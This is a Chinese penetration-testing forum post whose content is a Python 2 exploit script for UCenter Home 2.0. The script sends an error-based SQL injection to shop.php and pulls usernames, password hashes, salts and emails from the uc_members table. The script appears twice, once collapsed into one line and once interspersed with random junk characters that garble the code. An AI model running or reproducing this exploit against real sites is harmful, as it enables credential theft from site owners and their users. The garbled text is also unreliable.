找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 UCenter Home 2.0 EXP
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 1997|回复: 0
打印 上一主题 下一主题

UCenter Home 2.0 EXP

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-1-23 09:18:17 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
#!/usr/bin/envpython importsys importurllib2 importre definfo(): print'From:http://www.exploit-db.com/exploits/14997/' print 'http://www.hake.cc/Web_loudong/' print'changed:qiaoy' print'exp:' print'./UCenter_Home_2.0.pysite' defmain(): ifl, O; A# k7 E4 j! a7 l  ?

) a9 f5 y" j5 i7 |
1 O: k% w5 k. c8 E" Z, p1 n7 X#!/usr/bin/env python  
8 g, i3 T' m. V 7 K) J' }/ y9 z) c
import sys  
. V% ]$ ]5 P6 fimport urllib2  
5 w' }" u5 y( R. A# ]import re  : V' j6 A$ H5 u. Y; K( T, \! K  J; O

  N+ m. ?% d, k* B6 rdef info():  
6 t' q4 }# I" L    print 'From:http://www.exploit-db.com/exploits/14997/'
9 q" X$ }; \7 a; ^    print 'http://www.hake.cc/Web_loudong/' % d5 C4 Q' o; w7 |( k
    print 'changed:qiaoy'  , S) D) Y7 B* D7 r6 M: m1 M
    print 'exp:'  6 g1 U0 K. }6 I$ ~8 [+ p6 U% m
    print ' ./UCenter_Home_2.0.py site'  0 K5 [/ ]3 b  U( F& N5 X: Z

% L0 l. I! d& I% W% X2 S$ S9 f: Gdef main():  * d, G- Y4 \. h- A% s
    if len(sys.argv) != 2:  5 E1 Y# a& A& p1 H- Q+ d9 H
        info()  
7 {7 L9 r4 R' p. C3 m8 a- r. }    else:  / t8 D6 b6 O6 q' {: b
        site = sys.argv[1]  ( ?$ G0 C  o0 ^7 Y- d6 S' v
        if site[0:7] == 'http://':  
7 J& c0 E9 a7 x$ G; ^- _8 {$ d            sitesite =site  
0 k# F! K  K/ ]' O( K  u' O7 b        elif site[0:8] == 'https://':  ' O4 N" i6 w6 w" A: Z/ ^) _) A- Y" [
            sitesite = site  
# X2 j7 Z8 G! S) m5 O. A  r        else:  
! e8 U+ S, a8 @. Y+ P3 q            site = 'http://'+site  3 f7 p3 Y$ y+ {' w! O
        try:  ) b4 p6 j7 ?: h& s8 ~+ I0 p
            url = site+'/shop.php?ac=view&shopid=50534+and+(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,cast(concat(uid,0x3a,username,0x3a,password,0x3a,salt,0x3a,email)+as+char),0x27,0x7e)+from+ucenter.uc_members+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+11=1'  
% y0 _: y3 z( D7 j5 k9 J            Value = urllib2.urlopen(url).read()  : I2 U( ^, B9 z, E
            Msg = re.findall(r'Duplicate entry \'~\'(.*?)\' for key',Value)[0]  + ^4 B- Q* S' A5 a0 a' t
            hacked = Msg.split(':')  
9 }, s+ W2 g9 ]2 F; A1 a            print 'Name:    '+hacked[1]  7 I: u  I- m$ c
            print 'Passwd:  '+hacked[2]  " O" |/ X' E6 R2 @8 o
            print 'salt:    '+hacked[3]  
1 c3 R- `! |( Z  u5 N            print 'email:   '+hacked[4]  
0 J' e9 n4 a: G/ p2 e        except:    I4 p6 |/ y7 e! J2 k% G  g* A
            print 'Sorry,I can\'t work............'  ) y0 p3 W1 ^" `
. E1 H! k% G, a0 L+ S8 f* o
if __name__ == '__main__':  
( D: M! Z3 T7 n    main()
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表